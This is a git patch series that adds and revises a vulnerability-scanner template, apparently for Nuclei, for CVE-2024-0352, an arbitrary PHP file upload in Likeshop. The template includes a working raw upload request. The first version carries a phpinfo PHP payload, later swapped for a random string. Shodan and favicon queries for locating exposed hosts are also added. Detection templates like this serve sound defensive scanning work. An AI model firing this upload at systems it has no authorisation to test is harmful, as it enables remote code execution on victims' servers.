From aadb7084f245745a216707dc652606fde0e2ad62 Mon Sep 17 00:00:00 2001
From: cookie <thanhtienlo6868@gmail.com>
Date: Wed, 10 Jan 2024 17:06:24 +0700
Subject: [PATCH 1/3] Added CVE-2024-0352 Template

---
 http/cves/2024/CVE-2024-0352.yaml | 55 +++++++++++++++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-0352.yaml

diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml
new file mode 100644
index 0000000000..236deb2ed6
--- /dev/null
+++ b/http/cves/2024/CVE-2024-0352.yaml
@@ -0,0 +1,55 @@
+id: CVE-2024-0352
+
+info:
+  name: Likeshop < 2.5.7.20210311 - File Unrestricted Upload
+  author: CookieHanHoan,babybash,samuelsamuelsamuel
+  severity: high
+  description: |
+    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
+  impact: |
+    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
+  remediation: Update to the latest version
+  reference:
+    - https://vuldb.com/?id.250120
+    - Shodan Dork html:"/pc/_nuxt/"
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
+    cvss-score: 7.3
+    cve-id: CVE-2024-0352
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: likeshop
+  tags: cve2024,rce,upload-file,likeshop
+
+variables:
+  filename: "{{rand_base(6)}}"
+  shellcode: "<?php phpinfo(); ?>"
+
+http:
+  - raw:
+      - |
+        POST /api/file/formimage HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
+        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+
+        ------WebKitFormBoundarygcflwtei
+        Content-Disposition: form-data; name="file";filename="{{filename}}.php"
+        Content-Type: application/x-php
+
+        {{shellcode}}
+        ------WebKitFormBoundarygcflwtei--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"name\":\"{{filename}}.php\"")'
+        condition: and
+    extractors:
+      - type: json
+        part: body
+        json:
+          - ".data.url"
\ No newline at end of file

From 4e78e5b5e68cd62e6418b280286999049a7774e6 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 10 Jan 2024 19:10:00 +0530
Subject: [PATCH 2/3] Update CVE-2024-0352.yaml

---
 http/cves/2024/CVE-2024-0352.yaml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml
index 236deb2ed6..f6d2b73db4 100644
--- a/http/cves/2024/CVE-2024-0352.yaml
+++ b/http/cves/2024/CVE-2024-0352.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-0352
 
 info:
-  name: Likeshop < 2.5.7.20210311 - File Unrestricted Upload
+  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
   author: CookieHanHoan,babybash,samuelsamuelsamuel
   severity: high
   description: |
@@ -10,8 +10,7 @@ info:
     The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
   remediation: Update to the latest version
   reference:
-    - https://vuldb.com/?id.250120
-    - Shodan Dork html:"/pc/_nuxt/"
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
     cvss-score: 7.3
@@ -20,12 +19,12 @@ info:
   metadata:
     verified: true
     max-request: 1
+    shodan-query: title:"Likeshop"
     vendor: likeshop
   tags: cve2024,rce,upload-file,likeshop
 
 variables:
   filename: "{{rand_base(6)}}"
-  shellcode: "<?php phpinfo(); ?>"
 
 http:
   - raw:
@@ -39,7 +38,7 @@ http:
         Content-Disposition: form-data; name="file";filename="{{filename}}.php"
         Content-Type: application/x-php
 
-        {{shellcode}}
+        {{randstr}}
         ------WebKitFormBoundarygcflwtei--
 
     matchers:
@@ -47,9 +46,11 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(body, "\"name\":\"{{filename}}.php\"")'
+          - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
         condition: and
+
     extractors:
       - type: json
         part: body
         json:
-          - ".data.url"
\ No newline at end of file
+          - ".data.url"

From e1216d096dcd7a70cc39d5b3ddbd61371170eb9b Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 10 Jan 2024 21:14:22 +0530
Subject: [PATCH 3/3] shodan query update & tags

---
 http/cves/2024/CVE-2024-0352.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml
index f6d2b73db4..e3255da65d 100644
--- a/http/cves/2024/CVE-2024-0352.yaml
+++ b/http/cves/2024/CVE-2024-0352.yaml
@@ -19,9 +19,9 @@ info:
   metadata:
     verified: true
     max-request: 1
-    shodan-query: title:"Likeshop"
+    shodan-query: http.favicon.hash:874152924
     vendor: likeshop
-  tags: cve2024,rce,upload-file,likeshop
+  tags: cve,cve2024,rce,file-upload,likeshop,instrusive
 
 variables:
   filename: "{{rand_base(6)}}"